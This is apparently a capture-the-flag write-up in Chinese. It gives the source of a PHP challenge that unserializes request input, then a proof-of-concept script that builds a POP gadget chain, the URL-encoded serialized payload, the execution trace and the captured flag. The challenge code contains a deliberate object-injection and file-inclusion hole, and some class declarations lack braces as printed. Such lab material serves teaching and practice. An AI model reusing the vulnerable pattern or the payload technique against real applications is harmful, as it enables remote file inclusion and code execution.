源码 <?php class Sagittarius private $arrow ; public function append ($value { printf ("%s\n" , __METHOD__ ); include ($value ); echo $flag ; } public function __invoke ( { printf ("%s\n" , __METHOD__ ); $this ->append ($this ->arrow); } } class Guardian public $jupiter ; public $zeus ; public function __toString ( { printf ("%s\n" , __METHOD__ ); return $this ->jupiter->zeus; } public function __wakeup ( { printf ("%s\n" , __METHOD__ ); echo $this ->zeus; } } class Target public $source ; public function __construct ( { $this ->source = array (); } public function __get ($key { printf ("%s\n" , __METHOD__ ); $func = $this ->source; return $func (); } } if (isset ($_REQUEST ['Sagittarius' ])) { unserialize ($_REQUEST ['Sagittarius' ]); } else { echo "系统检测发现该处漏洞,进行攻击测试\n" ; } ?>
POC <?php class Sagittarius private $arrow = 'flag.php' ; } class Guardian public $jupiter ; public $zeus ; } class Target public $source ; } $s = new Sagittarius ();$g = new Guardian ();$t = new Target ();$g ->zeus = $g ;$g ->zeus->jupiter = $t ;$t ->source = $s ;echo urlencode (serialize ($g ));
O%3A8%3A%22Guardian%22%3A2%3A%7Bs%3A7%3A%22jupiter%22%3BO%3A6%3A%22Target%22%3A1%3A%7Bs%3A6%3A%22source%22%3BO%3A11%3A%22Sagittarius%22%3A1%3A%7Bs%3A18%3A%22%00Sagittarius%00arrow%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7Ds%3A4%3A%22zeus%22%3Br%3A1%3B%7D
得到
Guardian::__wakeup Guardian::__toString Target::__get Sagittarius::__invoke Sagittarius::append Sonder{135d79-ba631f65200a5f-870225232871-7af1e740} Catchable fatal error: Method Guardian::__toString() must return a string value in /var/www/html/module/source.php on line 36
pop 链入口:Guardian::__wakeup
pop 链目标:Sagittarius::__invoke
参考:https://www.yuque.com/shiyizhesonder/sonder39/dgqgwnxbpu74mvvc
https://www.yuque.com/shiyizhesonder/sonder39/wknqdphecihy73u1
